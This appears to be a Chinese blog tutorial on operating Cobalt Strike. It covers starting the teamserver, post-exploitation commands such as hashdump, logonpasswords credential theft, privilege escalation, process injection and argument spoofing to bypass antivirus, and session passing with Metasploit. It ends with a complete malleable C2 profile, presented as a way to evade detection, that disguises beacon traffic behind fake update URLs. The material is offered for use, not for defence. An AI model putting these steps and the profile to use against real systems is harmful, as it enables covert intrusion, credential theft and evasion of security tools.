CobaltStrike

1、CobaltStrike的启动

先开启服务端:./teamserver 192.168.1.112 123456
再启动客户端进行连接:./start.sh
也可以在windows上启动客户端进行连接

    javaw -Dfile.encoding=UTF-8 -javaagent:CobaltStrikeCN.jar -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

2、工具条

连接另一个服务器

断开当前服务器

配置监听

切换为服务器节点图

切换成会话列表

切换成目标列表

查看凭据

查看下载的文件

查看键盘记录

查看屏幕截图

生产载荷

生产java攻击载荷

生产宏

web传递攻击

3、后渗透命令

sleep:设置交互时间

shell/run:使用cmd执行命令

execute:执行一个文件

powershell:执行powershell命令

powerpick:不调用powershel执行powershell命令

execute-assembly:执行一个.net程序

pwd:查看目录

cd:切换目录

file brower:以界面化的形式查看文件结构

process list:以界面化的形式查看进程

portscan:端口扫描

shinject:进程注入

ps:查看进程列表

getuid:查看用户信息

getprivs:查看用户详细权限

getsystem:尝试提权

hashdump:导出用户密码(加密)

logonpasswords:尝试抓明文密码

argue:参数欺骗(绕过杀软)
    用法:argue [command] [fake arguements]

4、联动msf(mc联动)

msf ——> cs

    1)首先要有一个msf的监听会话

    2)使用msf中的指定模块
        use exploit/windows/local/payload_inject

    3)设置payload等配置,设置payload时,最后的协议要与cs中的一样,端口也要一样
    4)然后cs就能接收到msf传来的监听了

cs ——> msf

    1)首先要有一个cs的监听会话

    2)用msf开启一个监听
3)在cs中新建一个foreign htt类型的监听
4)然后cs会话派生给新建的msfshell监听
5)最后msf就会收到监听了

5、cs流量加密(免杀)

C2-profile

    1)使用keytool生成.store文件
        keytool -genkey -alias demo -keyalg RSA -validity 36500 -keystore demo.store
    2)创建C2.profile文件,加入以下内容

    set sample_name "obse POS Malware";
    set sleeptime "5000"; # use a ~30s delay between callbacks
    set jitter    "10";    # throw in a 10% jitter

    set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0";

    #设置证书,注意以下内容得和你之前生成的证书一样
    https-certificate {
        set CN       "ob"; 
        set O        "ob";   
        set C        "ob";
        set L        "ob";
        set OU       "ob";  
        set ST       "ob";
        set validity "365";
    }
    #设置,修改成你的证书名称和证书密码
    code-signer{
        set keystore "demo.store";
        set password "123456";
        set alias "demo";
    }

    #指定DNS beacon不用的时候指定到IP地址
    set dns_idle "8.8.4.4";

    #每个单独DNS请求前强制睡眠时间
    set dns_sleep "0";

    #通过DNS上载数据时主机名的最大长度[0-255]
    set maxdns    "235";

    http-post {
        set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php /windowsxp/updcheck.php /hello/flash.php";

        client {
            header "Accept" "text/plain";
            header "Accept-Language" "en-us";
            header "Accept-Encoding" "text/plain";
            header "Content-Type" "application/x-www-form-urltrytryd";

            id {
                netbios;
                parameter "id";
            }

            output {
                base64;
                prepend "&op=1&id=vxeykS&ui=Josh @ PC&wv=11&gr=backoff&bv=1.55&data=";
                print;
            }
        }

        server {
            output {
                print;
            }
        }
    }

    http-get {
        set uri "/updates";

        client {
            metadata {
                netbiosu;
                prepend "user=";
                header "Cookie";
            }
        }

        server {
            header "Content-Type" "text/plain";

            output {
                base64;
                print;
            }
        }
    }

3)使用 ./c2lint C2.profile 命令测试profile文件是否可用(没有保错就是可用的)
4)重新启动cs:./teamserver 192.168.0.108 123456 ./C2.profile
5)之后再生成payload,监听就可以达到免杀的效果了

6、CS插件

https://www.cobaltstrike.com/aggressor-script/index.html
文章目录
  1. 1. 1、CobaltStrike的启动
  2. 2. 2、工具条
  3. 3. 3、后渗透命令
  4. 4. 4、联动msf(mc联动)
  5. 5. 5、cs流量加密(免杀)
  6. 6. 6、CS插件
|